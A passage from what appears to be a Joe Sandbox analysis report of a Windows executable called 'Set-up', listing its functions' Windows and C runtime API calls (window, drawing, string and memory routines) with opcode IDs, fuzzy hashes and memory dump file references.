                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: gfff$gfff$gfff
                                                                                          • API String ID: 3668304517-4275324669
                                                                                          • Opcode ID: d49f9f78538857cc099c6e20b808b7dd35081b5f3c652c34e6fc0a7cb48f8243
                                                                                          • Instruction ID: a49154ef67d0f0cf5d711fce5f4480268189ab90c537b78d00f34e688d97771b
                                                                                          • Opcode Fuzzy Hash: d49f9f78538857cc099c6e20b808b7dd35081b5f3c652c34e6fc0a7cb48f8243
                                                                                          • Instruction Fuzzy Hash: 4851C172A001158BCB28DF2DD9C4969B7A5EB84360719C2AEE85DCF345EB30ED44CBD1
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00A8BF8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: gfff$gfff$gfff
                                                                                          • API String ID: 3668304517-4275324669
                                                                                          • Opcode ID: af3d4de0fa20a924bdc557ec0f6b8c27926f6872634ad8bf02c6f493296e4e35
                                                                                          • Instruction ID: e592696357f3e58460dbac85aa0da32bb3e852f0983e66695eecdc5ac3a249c4
                                                                                          • Opcode Fuzzy Hash: af3d4de0fa20a924bdc557ec0f6b8c27926f6872634ad8bf02c6f493296e4e35
                                                                                          • Instruction Fuzzy Hash: 0C61BDB2A001069FC718EF2DD884A69FBA1FF84354714C26EE919CB341E731EE55CBA1
                                                                                          APIs
                                                                                          • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,.xXnN,?,00BD845D), ref: 00BECF55
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: strpbrk
                                                                                          • String ID: .xXnN
                                                                                          • API String ID: 3024680390-518896573
                                                                                          • Opcode ID: afc4465ea7112fe196ac69395e72f13a0ff463608ac84d47fd1eab7caccf68db
                                                                                          • Instruction ID: 82442dc4877858a289453a01fe7bdbff2db77dd30de5868532e07a9a04e93ad4
                                                                                          • Opcode Fuzzy Hash: afc4465ea7112fe196ac69395e72f13a0ff463608ac84d47fd1eab7caccf68db
                                                                                          • Instruction Fuzzy Hash: B441CA316083858FD724DF2DD8516ABBBE2EFC8714F0486AEE84987245EF319909C7D2
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(70576E16,?,?,?,70576E16), ref: 00AD14FC
                                                                                            • Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,000000FF,?,?), ref: 00AD160A
                                                                                            • Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD1647
                                                                                            • Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00AD168A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: atol$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: $/* X$PM *
                                                                                          • API String ID: 330352240-2013423866
                                                                                          • Opcode ID: 00c7636de2b14a704f51917c9196c604adef09c23f7579063d3a13c41598d28b
                                                                                          • Instruction ID: 2a6055cd92bd0ecceb57e7ec1995f57fbf1fb0ef496188876ec41b85845e408f
                                                                                          • Opcode Fuzzy Hash: 00c7636de2b14a704f51917c9196c604adef09c23f7579063d3a13c41598d28b
                                                                                          • Instruction Fuzzy Hash: E6310BB1E00204ABDB15CF64E9857AEBB74EB80314F10826EE8178B3C6C77DD944C791
                                                                                          APIs
                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00BDAB42
                                                                                          • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00BDAB5C
                                                                                          • lua_pushstring.SET-UP(?,00000000), ref: 00BDAB67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _errnolua_pushstringstrerror
                                                                                          • String ID: exit
                                                                                          • API String ID: 2053890457-2483651598
                                                                                          • Opcode ID: 1664a837ba938245929e2039d083e913929927136aeb9c3bcc1a096b44f92eec
                                                                                          • Instruction ID: 9b043a0fd8b710ca25fd2e2d41c2c91fa237110b3e6b5b053eb267d54a35e189
                                                                                          • Opcode Fuzzy Hash: 1664a837ba938245929e2039d083e913929927136aeb9c3bcc1a096b44f92eec
                                                                                          • Instruction Fuzzy Hash: C83178B5600A049FD7108F18D484B26FBE5EB44338F14C59AE89A8B792D37AEC42CF91
                                                                                          APIs
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00A636A6
                                                                                          • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A63741
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CompatibleObjectSectionSelect
                                                                                          • String ID: (
                                                                                          • API String ID: 2004861804-3887548279
                                                                                          • Opcode ID: 9901edd346983032d206eac6f7214d50737620f9dab02d483575e1548a527455
                                                                                          • Instruction ID: 1b1a9099ad1db6859498182ce68dbc56da897d5db4cb798999e16e6b444351ec
                                                                                          • Opcode Fuzzy Hash: 9901edd346983032d206eac6f7214d50737620f9dab02d483575e1548a527455
                                                                                          • Instruction Fuzzy Hash: 7A31A6B49017099FDB64CFA8D554BAEBBF4FB08704F10852DE85AA7780D775AA08CF90
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000FA), ref: 00A72034
                                                                                          • CreateWindowExW.USER32(00000000,CallTip,ACallTip,80000000,00000064,00000064,00000096,00000014,?,00000000,00000000), ref: 00A72060
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateLong
                                                                                          • String ID: ACallTip$CallTip
                                                                                          • API String ID: 1475011609-1662286206
                                                                                          • Opcode ID: d7efa294ac51c3497b348f2ff36a25922d5a73178738cc171328058ec7f77cb7
                                                                                          • Instruction ID: 84c7170c13a9106b372386e2561abf44c86386bf062a95b75bec204f34f77d85
                                                                                          • Opcode Fuzzy Hash: d7efa294ac51c3497b348f2ff36a25922d5a73178738cc171328058ec7f77cb7
                                                                                          • Instruction Fuzzy Hash: A1F01C70A48B51AEE7305F648C09FC37A94EB0571AF11061DB6AF691D0C7F52450CF50
                                                                                          APIs
                                                                                            • Part of subcall function 00A6B960: memcpy.VCRUNTIME140(?,70576E16,70576E16,?,?,70576E16,?,00000001,?,00A97221,?,?,70576E16,70576E16,?,70576E16), ref: 00A6B988
                                                                                          • ?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z.MSVCP140(00000000,00000000,?,?,70576E16,70576E16,?,70576E16,70576E16), ref: 00A97237
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A972BD
                                                                                          • ?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z.MSVCP140(00000000,00000000,?,?,?), ref: 00A97344
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ?tolower@?$ctype@D@std@@$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3511086462-0
                                                                                          • Opcode ID: bfdde20a1d2998bfa5dbe4218e5fb0ecfbd5bda0c963e22230224e46c896ba75
                                                                                          • Instruction ID: e507a3e8a369392e2fd9954bf798a4ae5aacfff2a0fab135dc298f4a87180cf0
                                                                                          • Opcode Fuzzy Hash: bfdde20a1d2998bfa5dbe4218e5fb0ecfbd5bda0c963e22230224e46c896ba75
                                                                                          • Instruction Fuzzy Hash: FFC12571E042089FDB15CFA8C984BADBBF5FF48304F248159E819AB392D735AA45CF60
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00A67CA0
                                                                                          • ClientToScreen.USER32(?,?), ref: 00A67CC3
                                                                                          • MonitorFromRect.USER32(?,00000002), ref: 00A67D55
                                                                                            • Part of subcall function 00A67BA0: GetMonitorInfoW.USER32(?,00000028), ref: 00A67BDB
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00A67EE0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: MonitorWindow$ClientFromInfoLongRectScreen
                                                                                          • String ID:
                                                                                          • API String ID: 3229540926-0
                                                                                          • Opcode ID: 8a577a768686e83d07ac638df0fff01de9a7a894c8c9571efcd81fcc8fd1538c
                                                                                          • Instruction ID: 595933764eeaefb1811dea51faae9f101a7e4da746bb5843196676db809ab81e
                                                                                          • Opcode Fuzzy Hash: 8a577a768686e83d07ac638df0fff01de9a7a894c8c9571efcd81fcc8fd1538c
                                                                                          • Instruction Fuzzy Hash: FC91D9B1E0110AEBCF02AF90D5596EE7FB4FF44750FA18884E855B22A9E73589318FC4
                                                                                          APIs
                                                                                            • Part of subcall function 00A63670: CreateCompatibleDC.GDI32(?), ref: 00A636A6
                                                                                            • Part of subcall function 00A63670: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
                                                                                            • Part of subcall function 00A63670: SelectObject.GDI32(?,00000000), ref: 00A63741
                                                                                          • AlphaBlend.MSIMG32(?,?,?,?,?,?,00000000,00000000,?,?), ref: 00A63EEE
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63F02
                                                                                          • DeleteObject.GDI32(?), ref: 00A63F11
                                                                                          • DeleteDC.GDI32(?), ref: 00A63F1C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CreateDeleteSelect$AlphaBlendCompatibleSection
                                                                                          • String ID:
                                                                                          • API String ID: 685221683-0
                                                                                          • Opcode ID: e743b8f8e1981ae034a702e2bd25fdc310aeff71df76d5e37f3ba24ce8c64632
                                                                                          • Instruction ID: d679ba52b53ffaa2156f1119a60896d9b0a2897c11ec208de035e801c778c249
                                                                                          • Opcode Fuzzy Hash: e743b8f8e1981ae034a702e2bd25fdc310aeff71df76d5e37f3ba24ce8c64632
                                                                                          • Instruction Fuzzy Hash: FB8169B2A08312DFCB04CF19D985A2EBBE5EFC4701F41491DF8D5A7694C630D969CBA2
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00A717A1
                                                                                            • Part of subcall function 00BFDF75: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF7D
                                                                                            • Part of subcall function 00BFDF75: _CxxThrowException.VCRUNTIME140(?,00C4E6BC), ref: 00BFEB61
                                                                                            • Part of subcall function 00BFDF75: _CxxThrowException.VCRUNTIME140(?,00C4E6F4), ref: 00BFEB7E
                                                                                            • Part of subcall function 00BFDF75: IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 00BFEB9D
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00A71877
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000014,00000000,00000000,?,?), ref: 00A718E7
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                          • memset.VCRUNTIME140 ref: 00A71949
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharExceptionMultiThrowWidememset$FeaturePresentProcessor_callnewhmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2227810024-0
                                                                                          • Opcode ID: b8b75750dd25ede4eb93d4ff19e2438123812101dcd72884c89a120aab758b20
                                                                                          • Instruction ID: fce24cf84b6f16096aba16019eacc15178ca12b90b462e8c007e9d751c5ed276
                                                                                          • Opcode Fuzzy Hash: b8b75750dd25ede4eb93d4ff19e2438123812101dcd72884c89a120aab758b20
                                                                                          • Instruction Fuzzy Hash: 5E81F670A003099BDB25CF68C851BEEBBF5EF05700F24C56DE59AAB381DB70A945CB90
                                                                                          APIs
                                                                                          • ShowWindow.USER32(00000000,00000000,?,?), ref: 00AC9E74
                                                                                          • memset.VCRUNTIME140 ref: 00AC9E85
                                                                                          • DestroyWindow.USER32(00000000), ref: 00AC9F4B
                                                                                            • Part of subcall function 00AC9B80: memset.VCRUNTIME140 ref: 00AC9B9C
                                                                                            • Part of subcall function 00AC9B80: DestroyWindow.USER32(00000000), ref: 00AC9BEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Destroymemset$Show
                                                                                          • String ID:
                                                                                          • API String ID: 1325792147-0
                                                                                          • Opcode ID: f9f4bdaa7974b3bf3ad620b078f7086dd8dbcd1ed97f08581d42d31f05af76e1
                                                                                          • Instruction ID: e019b84da027fc2ede6327eed778dd28adf4b40692299487ee97b25b6a18e015
                                                                                          • Opcode Fuzzy Hash: f9f4bdaa7974b3bf3ad620b078f7086dd8dbcd1ed97f08581d42d31f05af76e1
                                                                                          • Instruction Fuzzy Hash: 14817EB1A002189FDF14DF28C988BAE77B6EB44304F0541FDE919AB291DB75AE84CF54
                                                                                          APIs
                                                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,000000FF,?,?), ref: 00AD160A
                                                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD1647
                                                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00AD168A
                                                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD16C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: atol
                                                                                          • String ID:
                                                                                          • API String ID: 1464325613-0
                                                                                          • Opcode ID: 41bf32dd28b5c52930db622a460ca246e91e9ae679d52a864e383ace88635e43
                                                                                          • Instruction ID: fe8be1017afa48c3f46d70c464eb5cbdbab9fb7a6b248ffa903424555818c6a9
                                                                                          • Opcode Fuzzy Hash: 41bf32dd28b5c52930db622a460ca246e91e9ae679d52a864e383ace88635e43
                                                                                          • Instruction Fuzzy Hash: 4861F4759042456FDB258F58C8C07E8BBA2EF56340F5C81A6D89B4B356D331E8C3CBA1
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00A6B4D2
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B4ED
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B559
                                                                                          • memset.VCRUNTIME140 ref: 00A6B574
                                                                                          Memory Dump Source
